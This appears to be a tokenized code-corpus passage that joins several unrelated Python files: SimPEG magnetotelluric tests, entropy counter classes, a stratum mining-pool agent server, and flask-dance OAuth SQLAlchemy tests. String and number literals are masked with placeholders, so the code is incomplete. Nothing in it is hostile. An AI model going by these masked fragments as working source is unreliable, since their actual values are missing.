'<STR_LIT:h>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_HJ_CrossCheck_hyr_Jform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT>' , '<STR_LIT:h>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_HJ_CrossCheck_hzr_Jform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT>' , '<STR_LIT:h>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_HJ_CrossCheck_hxi_Jform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT>' , '<STR_LIT:h>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_HJ_CrossCheck_hyi_Jform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT>' , '<STR_LIT:h>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> def test_HJ_CrossCheck_hzi_Jform ( self ) : <EOL> self . assertTrue ( crossCheckTest ( SrcList , '<STR_LIT>' , '<STR_LIT:h>' , '<STR_LIT>' , verbose = verbose ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import unittest <EOL> import SimPEG as simpeg <EOL> from SimPEG import MT <EOL> from SimPEG . Utils import meshTensor <EOL> import numpy as np <EOL> TOLr = <NUM_LIT> <EOL> TOLp = <NUM_LIT> <EOL> def setupSurvey ( sigmaHalf , tD = True ) : <EOL> nFreq = <NUM_LIT> <EOL> freqs = np . logspace ( <NUM_LIT:3> , - <NUM_LIT:3> , nFreq ) <EOL> ct = <NUM_LIT:5> <EOL> air = meshTensor ( [ ( ct , <NUM_LIT> , <NUM_LIT> ) ] ) <EOL> core = np . concatenate ( ( np . kron ( meshTensor ( [ ( ct , <NUM_LIT:15> , - <NUM_LIT> ) ] ) , np . ones ( ( <NUM_LIT:10> , ) ) ) , meshTensor ( [ ( ct , <NUM_LIT:20> ) ] ) ) ) <EOL> bot = meshTensor ( [ ( core [ <NUM_LIT:0> ] , <NUM_LIT:15> , - <NUM_LIT> ) ] ) <EOL> x0 = - np . array ( [ np . sum ( np . concatenate ( ( core , bot ) ) ) ] ) <EOL> m1d = simpeg . Mesh . TensorMesh ( [ np . concatenate ( ( bot , core , air ) ) ] , x0 = x0 ) <EOL> sigma = np . zeros ( m1d . nC ) + sigmaHalf <EOL> sigma [ m1d . gridCC > <NUM_LIT:0> ] = <NUM_LIT> <EOL> sigmaBack = sigma . copy ( ) <EOL> shallow = ( m1d . gridCC < - <NUM_LIT:200> ) * ( m1d . gridCC > - <NUM_LIT> ) <EOL> deep = ( m1d . gridCC < - <NUM_LIT> ) * ( m1d . gridCC > - <NUM_LIT> ) <EOL> sigma [ shallow ] = <NUM_LIT:1> <EOL> sigma [ deep ] = <NUM_LIT:0.1> <EOL> rxList = [ ] <EOL> for rxType in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> rxList . append ( MT . Rx ( simpeg . mkvc ( np . array ( [ <NUM_LIT:0.0> ] ) , <NUM_LIT:2> ) . T , rxType ) ) <EOL> srcList = [ ] <EOL> if tD : <EOL> for freq in freqs : <EOL> srcList . append ( MT . SrcMT . polxy_1DhomotD ( rxList , freq ) ) <EOL> else : <EOL> for freq in freqs : <EOL> srcList . append ( MT . SrcMT . polxy_1Dprimary ( rxList , freq ) ) <EOL> survey = MT . Survey ( srcList ) <EOL> return survey , sigma , m1d <EOL> def getAppResPhs ( MTdata ) : <EOL> def appResPhs ( freq , z ) : <EOL> app_res = ( ( <NUM_LIT:1.> / ( <NUM_LIT> * np . pi ** <NUM_LIT:2> ) ) / freq ) * np . abs ( z ) ** <NUM_LIT:2> <EOL> app_phs = np . arctan2 ( z . imag , z . real ) * ( <NUM_LIT> / np . pi ) <EOL> return app_res , app_phs <EOL> zList = [ ] <EOL> for src in MTdata . survey . srcList : <EOL> zc = [ src . freq ] <EOL> for rx in src . rxList : <EOL> if '<STR_LIT:i>' in rx . rxType : <EOL> m = <NUM_LIT> <EOL> else : <EOL> m = <NUM_LIT:1> <EOL> zc . append ( m * MTdata [ src , rx ] ) <EOL> zList . append ( zc ) <EOL> return [ appResPhs ( zList [ i ] [ <NUM_LIT:0> ] , np . sum ( zList [ i ] [ <NUM_LIT:1> : <NUM_LIT:3> ] ) ) for i in np . arange ( len ( zList ) ) ] <EOL> def calculateAnalyticSolution ( srcList , mesh , model ) : <EOL> surveyAna = MT . Survey ( srcList ) <EOL> data1D = MT . Data ( surveyAna ) <EOL> for src in surveyAna . srcList : <EOL> elev = src . rxList [ <NUM_LIT:0> ] . locs [ <NUM_LIT:0> ] <EOL> anaEd , anaEu , anaHd , anaHu = MT . Utils . MT1Danalytic . getEHfields ( mesh , model , src . freq , elev ) <EOL> anaE = anaEd + anaEu <EOL> anaH = anaHd + anaHu <EOL> anaZ = anaE / anaH <EOL> for rx in src . rxList : <EOL> data1D [ src , rx ] = getattr ( anaZ , rx . projComp ) <EOL> return data1D <EOL> def dataMis_AnalyticTotalDomain ( sigmaHalf ) : <EOL> surveyTD , sigma , mesh = setupSurvey ( sigmaHalf ) <EOL> problemTD = MT . Problem1D . eForm_TotalField ( mesh ) <EOL> problemTD . pair ( surveyTD ) <EOL> dataAnaObj = calculateAnalyticSolution ( surveyTD . srcList , mesh , sigma ) <EOL> dataTD = surveyTD . dpred ( sigma ) <EOL> dataAna = simpeg . mkvc ( dataAnaObj ) <EOL> return np . all ( ( dataTD - dataAna ) / dataAna < <NUM_LIT> ) <EOL> def dataMis_AnalyticPrimarySecondary ( sigmaHalf ) : <EOL> surveyPS , sigmaPS , mesh = setupSurvey ( sigmaHalf , tD = False ) <EOL> problemPS = MT . Problem1D . eForm_psField ( mesh ) <EOL> problemPS . sigmaPrimary = sigmaPS <EOL> problemPS . pair ( surveyPS ) <EOL> dataAnaObj = calculateAnalyticSolution ( surveyPS . srcList , mesh , sigmaPS ) <EOL> dataPS = surveyPS . dpred ( sigmaPS ) <EOL> dataAna = simpeg . mkvc ( dataAnaObj ) <EOL> return np . all ( ( dataPS - dataAna ) / dataAna < <NUM_LIT> ) <EOL> class TestNumericVsAnalytics ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> pass <EOL> def test_appRes2en2_ps ( self ) : self . assertTrue ( dataMis_AnalyticPrimarySecondary ( <NUM_LIT> ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import math <EOL> import numpy <EOL> from collections import defaultdict <EOL> class Counter ( defaultdict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , target ) : <EOL> super ( Counter , self ) . __init__ ( int ) <EOL> self . target = target <EOL> self . total = <NUM_LIT:0> <EOL> def add ( self , example ) : <EOL> value = self . target ( example ) <EOL> self [ value ] += <NUM_LIT:1> <EOL> self . total += <NUM_LIT:1> <EOL> class OnlineEntropy ( Counter ) : <EOL> def get_entropy ( self ) : <EOL> s = <NUM_LIT:0.0> <EOL> for count in self . itervalues ( ) : <EOL> p = count / float ( self . total ) <EOL> s += p * math . log ( p , <NUM_LIT:2> ) <EOL> return - s <EOL> class OnlineInformationGain ( object ) : <EOL> def __init__ ( self , attribute , target ) : <EOL> self . attribute = attribute <EOL> self . H = OnlineEntropy ( target ) <EOL> self . G = defaultdict ( lambda : OnlineEntropy ( target ) ) <EOL> def add ( self , example ) : <EOL> self . H . add ( example ) <EOL> value = self . attribute ( example ) <EOL> self . G [ value ] . add ( example ) <EOL> def get_target_class_counts ( self ) : <EOL> return self . H <EOL> def get_branches ( self ) : <EOL> return self . G . items ( ) <EOL> def get_gain ( self ) : <EOL> H1 = self . H . get_entropy ( ) <EOL> H2 = <NUM_LIT:0.0> <EOL> for G in self . G . itervalues ( ) : <EOL> w = G . total / float ( self . H . total ) <EOL> H2 += w * G . get_entropy ( ) <EOL> return H1 - H2 <EOL> class OnlineLogProbability ( object ) : <EOL> def __init__ ( self ) : <EOL> self . d = defaultdict ( int ) <EOL> self . _logtotal = None <EOL> def add ( self , x ) : <EOL> if self . _logtotal is not None : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . d [ x ] += <NUM_LIT:1> <EOL> def __getitem__ ( self , x ) : <EOL> if x not in self : <EOL> raise KeyError ( x ) <EOL> if self . _logtotal is None : <EOL> self . _logtotal = numpy . log ( sum ( self . d . itervalues ( ) ) ) <EOL> return numpy . log ( self . d [ x ] ) - self . _logtotal <EOL> def __contains__ ( self , x ) : <EOL> return x in self . d <EOL> def __iter__ ( self ) : <EOL> return iter ( self . d ) <EOL> def __len__ ( self ) : <EOL> return len ( self . d ) <EOL> def iteritems ( self ) : <EOL> for x in self . d : <EOL> yield x , self [ x ] </s>
<s> import json <EOL> import socket <EOL> from time import time <EOL> from gevent . queue import Queue <EOL> from gevent . pool import Pool <EOL> from gevent . server import StreamServer <EOL> from gevent import with_timeout <EOL> from . server import GenericClient <EOL> from . lib import Component , loop <EOL> from . exceptions import LoopExit <EOL> class AgentServer ( Component , StreamServer ) : <EOL> """<STR_LIT>""" <EOL> _spawn = None <EOL> def __init__ ( self , stratum_server ) : <EOL> self . server = stratum_server <EOL> self . config = stratum_server . config <EOL> def start ( self , * args , ** kwargs ) : <EOL> self . logger = self . server . logger <EOL> self . listener = ( self . config [ '<STR_LIT:address>' ] , <EOL> self . config [ '<STR_LIT:port>' ] + <EOL> self . config [ '<STR_LIT>' ] [ '<STR_LIT>' ] + <EOL> self . server . manager . config [ '<STR_LIT>' ] ) <EOL> StreamServer . __init__ ( self , self . listener , spawn = Pool ( ) ) <EOL> self . logger . info ( "<STR_LIT>" . format ( self . listener ) ) <EOL> StreamServer . start ( self , * args , ** kwargs ) <EOL> Component . start ( self ) <EOL> def stop ( self , * args , ** kwargs ) : <EOL> self . logger . info ( "<STR_LIT>" . format ( self . listener ) ) <EOL> StreamServer . close ( self ) <EOL> for serv in self . server . agent_clients . values ( ) : <EOL> serv . stop ( ) <EOL> Component . stop ( self ) <EOL> self . logger . info ( "<STR_LIT>" ) <EOL> def handle ( self , sock , address ) : <EOL> self . logger . info ( "<STR_LIT>" <EOL> . format ( address , sock ) ) <EOL> self . server . agent_id_count += <NUM_LIT:1> <EOL> client = AgentClient ( <EOL> sock = sock , <EOL> address = address , <EOL> id = self . server . agent_id_count , <EOL> server = self . server , <EOL> config = self . config , <EOL> logger = self . logger , <EOL> reporter = self . server . reporter ) <EOL> client . start ( ) <EOL> class AgentClient ( GenericClient ) : <EOL> """<STR_LIT>""" <EOL> errors = { <EOL> <NUM_LIT:20> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT:30> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT:32> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> } <EOL> def __init__ ( self , sock , address , id , server , config , logger , reporter ) : <EOL> self . logger = logger <EOL> self . sock = sock <EOL> self . server = server <EOL> self . config = config <EOL> self . reporter = reporter <EOL> sock . setsockopt ( socket . SOL_TCP , socket . TCP_KEEPIDLE , <NUM_LIT> ) <EOL> sock . setsockopt ( socket . SOL_TCP , socket . TCP_KEEPINTVL , <NUM_LIT:1> ) <EOL> sock . setsockopt ( socket . SOL_TCP , socket . TCP_KEEPCNT , <NUM_LIT:5> ) <EOL> self . _disconnected = False <EOL> self . _authenticated = False <EOL> self . _client_state = None <EOL> self . _authed = { } <EOL> self . _client_version = None <EOL> self . _connection_time = time ( ) <EOL> self . _id = id <EOL> self . write_queue = Queue ( ) <EOL> self . fp = None <EOL> self . _stopped = False <EOL> @ property <EOL> def summary ( self ) : <EOL> return dict ( workers = self . _authed , <EOL> connection_time = self . _connection_time_dt ) <EOL> def send_error ( self , num = <NUM_LIT:20> ) : <EOL> """<STR_LIT>""" <EOL> err = { '<STR_LIT:result>' : None , '<STR_LIT:error>' : ( num , self . errors [ num ] , None ) } <EOL> self . logger . debug ( "<STR_LIT>" . format ( err ) ) <EOL> self . write_queue . put ( json . dumps ( err , separators = ( '<STR_LIT:U+002C>' , '<STR_LIT::>' ) ) + "<STR_LIT:\n>" ) <EOL> def send_success ( self ) : <EOL> """<STR_LIT>""" <EOL> succ = { '<STR_LIT:result>' : True , '<STR_LIT:error>' : None } <EOL> self . logger . debug ( "<STR_LIT>" . format ( succ ) ) <EOL> self . write_queue . put ( json . dumps ( succ , separators = ( '<STR_LIT:U+002C>' , '<STR_LIT::>' ) ) + "<STR_LIT:\n>" ) <EOL> @ loop ( fin = '<STR_LIT>' , exit_exceptions = ( socket . error , ) ) <EOL> def read ( self ) : <EOL> if self . _disconnected : <EOL> self . logger . info ( "<STR_LIT>" <EOL> . format ( self . _id ) ) <EOL> return <EOL> line = with_timeout ( self . config [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> self . fp . readline , <EOL> timeout_value = '<STR_LIT>' ) <EOL> if line == '<STR_LIT>' : <EOL> raise LoopExit ( "<STR_LIT>" ) <EOL> line = line . strip ( ) <EOL> if not line : <EOL> raise LoopExit ( "<STR_LIT>" ) <EOL> try : <EOL> data = json . loads ( line ) <EOL> except ValueError : <EOL> self . logger . info ( "<STR_LIT>" . format ( line ) ) <EOL> self . send_error ( ) <EOL> return <EOL> self . logger . debug ( "<STR_LIT>" . format ( data , self . _id ) ) <EOL> if '<STR_LIT>' not in data : <EOL> self . logger . info ( "<STR_LIT>" . format ( data ) ) <EOL> self . send_error ( ) <EOL> meth = data [ '<STR_LIT>' ] . lower ( ) <EOL> if meth == '<STR_LIT:hello>' : <EOL> if self . _client_version is not None : <EOL> self . send_error ( <NUM_LIT:32> ) <EOL> return <EOL> self . _client_version = data . get ( '<STR_LIT>' , [ <NUM_LIT:0.1> ] ) [ <NUM_LIT:0> ] <EOL> self . logger . info ( "<STR_LIT>" <EOL> . format ( self . _id , self . _client_version ) ) <EOL> elif meth == '<STR_LIT>' : <EOL> if self . _client_version is None : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> username = data . get ( '<STR_LIT>' , [ "<STR_LIT>" ] ) [ <NUM_LIT:0> ] <EOL> user_worker = self . convert_username ( username ) <EOL> self . client_state = self . server . address_worker_lut . get ( user_worker ) <EOL> if not self . client_state : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> self . _authed [ username ] = user_worker <EOL> self . send_success ( ) <EOL> self . logger . info ( "<STR_LIT>" <EOL> . format ( self . _id , username ) ) <EOL> elif meth == "<STR_LIT>" : <EOL> if self . _client_version is None : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> if data . get ( '<STR_LIT>' , [ '<STR_LIT>' ] ) [ <NUM_LIT:0> ] not in self . _authed : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> if '<STR_LIT>' not in data or len ( data [ '<STR_LIT>' ] ) != <NUM_LIT:4> : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> user_worker , typ , data , stamp = data [ '<STR_LIT>' ] <EOL> address , worker = self . _authed [ user_worker ] <EOL> if typ in self . config [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> self . reporter . agent_send ( address , worker , typ , data , stamp ) <EOL> self . send_success ( ) <EOL> self . logger . info ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( self . _id , address , worker , typ , len ( line ) ) ) <EOL> else : <EOL> self . send_error ( <NUM_LIT> ) </s>
<s> import pytest <EOL> sa = pytest . importorskip ( "<STR_LIT>" ) <EOL> import os <EOL> import responses <EOL> import flask <EOL> from lazy import lazy <EOL> from flask_sqlalchemy import SQLAlchemy <EOL> from sqlalchemy import event <EOL> from sqlalchemy . orm . exc import NoResultFound <EOL> from flask_cache import Cache <EOL> from flask_login import LoginManager , UserMixin , current_user , login_user , logout_user <EOL> from flask_dance . consumer import OAuth2ConsumerBlueprint , oauth_authorized <EOL> from flask_dance . consumer . backend . sqla import OAuthConsumerMixin , SQLAlchemyBackend <EOL> try : <EOL> import blinker <EOL> except ImportError : <EOL> blinker = None <EOL> requires_blinker = pytest . mark . skipif ( not blinker , reason = "<STR_LIT>" ) <EOL> pytestmark = [ <EOL> pytest . mark . usefixtures ( "<STR_LIT>" ) , <EOL> ] <EOL> @ pytest . fixture <EOL> def blueprint ( ) : <EOL> bp = OAuth2ConsumerBlueprint ( "<STR_LIT>" , __name__ , <EOL> client_id = "<STR_LIT>" , <EOL> client_secret = "<STR_LIT>" , <EOL> state = "<STR_LIT>" , <EOL> base_url = "<STR_LIT>" , <EOL> authorization_url = "<STR_LIT>" , <EOL> token_url = "<STR_LIT>" , <EOL> redirect_url = "<STR_LIT>" , <EOL> ) <EOL> responses . add ( <EOL> responses . POST , <EOL> "<STR_LIT>" , <EOL> body = '<STR_LIT>' , <EOL> ) <EOL> return bp <EOL> @ pytest . fixture <EOL> def db ( ) : <EOL> return SQLAlchemy ( ) <EOL> @ pytest . fixture <EOL> def app ( blueprint , db , request ) : <EOL> app = flask . Flask ( __name__ ) <EOL> app . config [ "<STR_LIT>" ] = os . environ . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> app . config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> app . secret_key = "<STR_LIT>" <EOL> app . register_blueprint ( blueprint , url_prefix = "<STR_LIT>" ) <EOL> db . init_app ( app ) <EOL> ctx = app . app_context ( ) <EOL> ctx . push ( ) <EOL> request . addfinalizer ( ctx . pop ) <EOL> return app <EOL> class record_queries ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , target , identifier = "<STR_LIT>" ) : <EOL> self . target = target <EOL> self . identifier = identifier <EOL> def record_query ( self , conn , cursor , statement , parameters , context , executemany ) : <EOL> self . queries . append ( statement ) <EOL> def __enter__ ( self ) : <EOL> self . queries = [ ] <EOL> event . listen ( self . target , self . identifier , self . record_query ) <EOL> return self . queries <EOL> def __exit__ ( self , exc_type , exc_value , traceback ) : <EOL> event . remove ( self . target , self . identifier , self . record_query ) <EOL> def test_sqla_backend_without_user ( app , db , blueprint , request ) : <EOL> class OAuth ( db . Model , OAuthConsumerMixin ) : <EOL> pass <EOL> blueprint . backend = SQLAlchemyBackend ( OAuth , db . session ) <EOL> db . create_all ( ) <EOL> def done ( ) : <EOL> db . session . remove ( ) <EOL> db . drop_all ( ) <EOL> request . addfinalizer ( done ) <EOL> with record_queries ( db . engine ) as queries : <EOL> with app . test_client ( ) as client : <EOL> with client . session_transaction ( ) as sess : <EOL> sess [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> resp = client . get ( <EOL> "<STR_LIT>" , <EOL> base_url = "<STR_LIT>" , <EOL> ) <EOL> assert resp . status_code == <NUM_LIT> <EOL> assert resp . headers [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert len ( queries ) == <NUM_LIT:2> <EOL> authorizations = OAuth . query . all ( ) <EOL> assert len ( authorizations ) == <NUM_LIT:1> <EOL> oauth = authorizations [ <NUM_LIT:0> ] <EOL> assert oauth . provider == "<STR_LIT>" <EOL> assert isinstance ( oauth . token , dict ) <EOL> assert oauth . token == { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> } <EOL> def test_sqla_model_repr ( app , db , request ) : <EOL> class MyAwesomeOAuth ( db . Model , OAuthConsumerMixin ) : <EOL> pass <EOL> db . create_all ( ) <EOL> def done ( ) : <EOL> db . session . remove ( ) <EOL> db . drop_all ( ) <EOL> request . addfinalizer ( done ) <EOL> o = MyAwesomeOAuth ( ) <EOL> assert "<STR_LIT>" in repr ( o ) <EOL> o . provider = "<STR_LIT>" <EOL> assert '<STR_LIT>' in repr ( o ) <EOL> o . token = { "<STR_LIT>" : "<STR_LIT>" } <EOL> assert "<STR_LIT>" not in repr ( o ) <EOL> db . session . add ( o ) <EOL> db . session . commit ( ) <EOL> assert "<STR_LIT>" in repr ( o ) <EOL> assert "<STR_LIT>" not in repr ( o ) <EOL> def test_sqla_backend ( app , db , blueprint , request ) : <EOL> class User ( db . Model ) : <EOL> id = db . Column ( db . Integer , primary_key = True ) <EOL> name = db . Column ( db . String ( <NUM_LIT> ) ) <EOL> class OAuth ( db . Model , OAuthConsumerMixin ) : <EOL> user_id = db . Column ( db . Integer , db . ForeignKey ( User . id ) ) <EOL> user = db . relationship ( User ) <EOL> db . create_all ( ) <EOL> def done ( ) : <EOL> db . session . remove ( ) <EOL> db . drop_all ( ) <EOL> request . addfinalizer ( done ) <EOL> alice = User ( name = "<STR_LIT>" ) <EOL> db . session . add ( alice ) <EOL> db . session . commit ( ) <EOL> alice . id <EOL> blueprint . backend = SQLAlchemyBackend ( OAuth , db . session , user = alice ) <EOL> with record_queries ( db . engine ) as queries : <EOL> with app . test_client ( ) as client : <EOL> with client . session_transaction ( ) as sess : <EOL> sess [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> resp = client . get ( <EOL> "<STR_LIT>" , <EOL> base_url = "<STR_LIT>" , <EOL> ) <EOL> assert resp . status_code == <NUM_LIT> <EOL> assert resp . headers [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert len ( queries ) == <NUM_LIT:3> <EOL> alice = User . query . first ( ) <EOL> authorizations = OAuth . query . all ( ) <EOL> assert len ( authorizations ) == <NUM_LIT:1> <EOL> oauth = authorizations [ <NUM_LIT:0> ] <EOL> assert oauth . user_id == alice . id <EOL> assert oauth . provider == "<STR_LIT>" <EOL> assert isinstance ( oauth . token , dict ) <EOL> assert oauth . token == { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> } <EOL> def test_sqla_load_token_for_user ( app , db , blueprint , request ) : <EOL> class User ( db . Model ) : <EOL> id = db . Column ( db . Integer , primary_key = True ) <EOL> name = db . Column ( db . String ( <NUM_LIT> ) ) <EOL> class OAuth ( db . Model , OAuthConsumerMixin ) : <EOL> user_id = db . Column ( db . Integer , db . ForeignKey ( User . id ) ) <EOL> user = db . relationship ( User ) <EOL> db . create_all ( ) <EOL> def done ( ) : <EOL> db . session . remove ( ) <EOL> db . drop_all ( ) <EOL> request . addfinalizer ( done ) <EOL> blueprint . backend = SQLAlchemyBackend ( OAuth , db . session ) <EOL> alice = User ( name = "<STR_LIT>" ) <EOL> alice_token = { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> alice_oauth = OAuth ( user = alice , token = alice_token , provider = "<STR_LIT>" ) <EOL> bob = User ( name = "<STR_LIT>" ) <EOL> bob_token = { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> bob_oauth = OAuth ( user = bob , token = bob_token , provider = "<STR_LIT>" ) <EOL> sue = User ( name = "<STR_LIT>" ) <EOL> sue_token = { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> sue_oauth = OAuth ( user = sue , token = sue_token , provider = "<STR_LIT>" ) <EOL> db . session . add_all ( [ alice , bob , sue , alice_oauth , bob_oauth , sue_oauth ] ) <EOL> db . session . commit ( ) <EOL> sess = blueprint . session <EOL> assert not sess . token <EOL> assert not blueprint . token <EOL> blueprint . config [ "<STR_LIT:user>" ] = alice <EOL> assert sess . token == alice_token <EOL> assert blueprint . token == alice_token <EOL> blueprint . config [ "<STR_LIT:user>" ] = bob <EOL> assert sess . token == bob_token <EOL> assert blueprint . token == bob_token <EOL> blueprint . config [ "<STR_LIT:user>" ] = alice <EOL> assert sess . token == alice_token <EOL> assert blueprint . token == alice_token <EOL> blueprint . config [ "<STR_LIT:user>" ] = sue <EOL> assert sess . token == sue_token <EOL> assert blueprint . token == sue_token <EOL> del blueprint . config [ "<STR_LIT:user>" ] <EOL> blueprint . config [ "<STR_LIT>" ] = bob . id <EOL> assert sess . token == bob_token <EOL> assert blueprint . token == bob_token <EOL> del blueprint . token <EOL> assert sess . token == None <EOL> assert blueprint . token == None <EOL> blueprint . config [ "<STR_LIT>" ] = alice . id <EOL> assert sess . token == alice_token <EOL> assert blueprint . token == alice_token <EOL> def test_sqla_flask_login ( app , db , blueprint , request ) : <EOL> login_manager = LoginManager ( app ) <EOL> class User ( db . Model , UserMixin ) : <EOL> id = db . Column ( db . Integer , primary_key = True ) <EOL> name = db . Column ( db . String ( <NUM_LIT> ) ) <EOL> class OAuth ( db . Model , OAuthConsumerMixin ) : <EOL> user_id = db . Column ( db . Integer , db . ForeignKey ( User . id ) ) <EOL> user = db . relationship ( User ) <EOL> blueprint . backend = SQLAlchemyBackend ( OAuth , db . session , user = current_user ) <EOL> db . create_all ( ) <EOL> def done ( ) : <EOL> db . session . remove ( ) <EOL> db . drop_all ( ) <EOL> request . addfinalizer ( done ) <EOL> u1 = User ( name = "<STR_LIT>" ) <EOL> u2 = User ( name = "<STR_LIT>" ) <EOL> u3 = User ( name = "<STR_LIT>" ) <EOL> db . session . add_all ( [ u1 , u2 , u3 ] ) <EOL> db . session . commit ( ) <EOL> @ login_manager . user_loader <EOL> def load_user ( userid ) : <EOL> return User . query . get ( userid ) <EOL> with record_queries ( db . engine ) as queries : <EOL> with app . test_client ( ) as client : <EOL> with client . session_transaction ( ) as sess : <EOL> sess [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> sess [ "<STR_LIT>" ] = u1 . id <EOL> resp = client . get ( <EOL> "<STR_LIT>" , <EOL> base_url = "<STR_LIT>" , <EOL> ) <EOL> assert resp . status_code == <NUM_LIT> <EOL> assert resp . headers [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert len ( queries ) == <NUM_LIT:4> <EOL> responses . reset ( ) <EOL> responses . add ( <EOL> responses . POST , <EOL> "<STR_LIT>" , <EOL> body = '<STR_LIT>' , <EOL> ) <EOL> with record_queries ( db . engine ) as queries : <EOL> with app . test_client ( ) as client : <EOL> with client . session_transaction ( ) as sess : <EOL> sess [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> sess [ "<STR_LIT>" ] = u2 . id <EOL> resp = client . get ( <EOL> "<STR_LIT>" , <EOL> base_url = "<STR_LIT>" , <EOL> ) <EOL> assert resp . status_code == <NUM_LIT> <EOL> assert resp . headers [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert len ( queries ) == <NUM_LIT:4> <EOL> authorizations = OAuth . query . all ( ) <EOL> assert len ( authorizations ) == <NUM_LIT:2> <EOL> u1_oauth = OAuth . query . filter_by ( user = u1 ) . one ( ) <EOL> assert u1_oauth . provider == "<STR_LIT>" <EOL> assert u1_oauth . token == { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> } <EOL> u2_oauth = OAuth . query . filter_by ( user = u2 ) . one ( ) <EOL> assert u2_oauth . provider == "<STR_LIT>" <EOL> assert u2_oauth . token == { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> } <EOL> u3_oauth = OAuth . query . filter_by ( user = u3 ) . all ( ) <EOL> assert len ( u3_oauth ) == <NUM_LIT:0> <EOL> @ requires_blinker <EOL> def test_sqla_flask_login_anon_to_authed ( app , db , blueprint , request ) : <EOL> login_manager = LoginManager ( app ) <EOL> class User ( db . Model , UserMixin ) : <EOL> id = db . Column ( db . Integer , primary_key = True ) <EOL> name = db . Column ( db . String ( <NUM_LIT> ) ) <EOL> class OAuth ( db . Model , OAuthConsumerMixin ) : <EOL> user_id = db . Column ( db . Integer , db . ForeignKey ( User . id ) ) <EOL> user = db . relationship ( User ) <EOL> blueprint . backend = SQLAlchemyBackend ( OAuth , db . session , user = current_user ) <EOL> db . create_all ( ) <EOL> def done ( ) : <EOL> db . session . remove ( ) <EOL> db . drop_all ( ) <EOL> request . addfinalizer ( done ) <EOL> @ login_manager . user_loader <EOL> def load_user ( userid ) : <EOL> return User . query . get ( userid ) <EOL> def logged_in ( sender , token ) : <EOL> assert token <EOL> assert blueprint == sender <EOL> resp = sender . session . get ( "<STR_LIT>" ) <EOL> user = User ( name = resp . json ( ) [ "<STR_LIT:name>" ] ) <EOL> login_user ( user ) <EOL> db . session . add ( user ) <EOL> db . session . commit ( ) <EOL> flask . flash ( "<STR_LIT>" ) <EOL> oauth_authorized . connect ( logged_in , blueprint ) <EOL> request . addfinalizer ( lambda : oauth_authorized . disconnect ( logged_in , blueprint ) ) <EOL> responses . add ( <EOL> responses . GET , <EOL> "<STR_LIT>" , <EOL> body = '<STR_LIT>' , <EOL> ) <EOL> with record_queries ( db . engine ) as queries : <EOL> with app . test_client ( ) as client : <EOL> with client . session_transaction ( ) as sess : <EOL> sess [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> resp = client . get ( <EOL> "<STR_LIT>" , <EOL> base_url = "<STR_LIT>" , <EOL> ) <EOL> assert resp . status_code == <NUM_LIT> <EOL> assert resp . headers [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert len ( queries ) == <NUM_LIT:5> <EOL> users = User . query . all ( ) <EOL> assert len ( users ) == <NUM_LIT:1> <EOL> user = users [ <NUM_LIT:0> ] <EOL> assert user . name == "<STR_LIT>" <EOL> authorizations = OAuth . query . all ( ) <EOL> assert len ( authorizations ) == <NUM_LIT:1> <EOL> oauth = authorizations [ <NUM_LIT:0> ] <EOL> assert oauth . provider == 